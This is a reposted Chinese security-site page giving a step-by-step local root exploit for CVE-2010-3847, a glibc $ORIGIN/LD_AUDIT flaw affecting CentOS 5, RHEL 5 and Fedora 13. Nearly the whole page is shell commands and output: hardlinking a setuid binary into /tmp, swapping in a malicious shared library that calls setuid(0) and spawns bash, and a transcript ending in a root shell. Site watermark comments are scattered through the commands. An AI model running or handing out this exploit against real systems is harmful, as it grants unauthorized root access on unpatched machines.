安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 业界资讯 > >CVE-2010-3847 提权 CentOS5/RHEL5/Fedora13

>CVE-2010-3847 提权 CentOS5/RHEL5/Fedora13

时间:2014-12-29来源: 作者:点击:

# 在/tmp下创建可控制的目录

$ mkdir /tmp/exploit //本文来自安云网 

# 链接到suid二进制程序以更改$ORIGIN的定义 //本文来自安云网

$ ln /bin/ping /tmp/exploit/target 
//内容来自AnYun.ORG

# 打开到目标二进制程序的文件描述符 //内容来自安云网

$ exec 3< /tmp/exploit/target //内容来自AnYun.ORG 

# 现在可通过/proc访问描述符 //copyright AnYun.ORG

$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* //安云网咨询系统 

# 删除之前所创建的目录 //内容来自安云网

$ rm -rf /tmp/exploit/ 
//安云网,anyun.org

# /proc链接仍存在,但已标记为已被删除 //内容来自AnYun.ORG

$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) 

//ANYUN.ORG

# 使用负载DSO替换目录,使$ORIGIN成为到dlopen()的有效目标 //内容来自安云网

$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* 

//安云网,anyun.org

# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN //内容来自AnYun.ORG

$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso) //安云网,anyun.org 
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容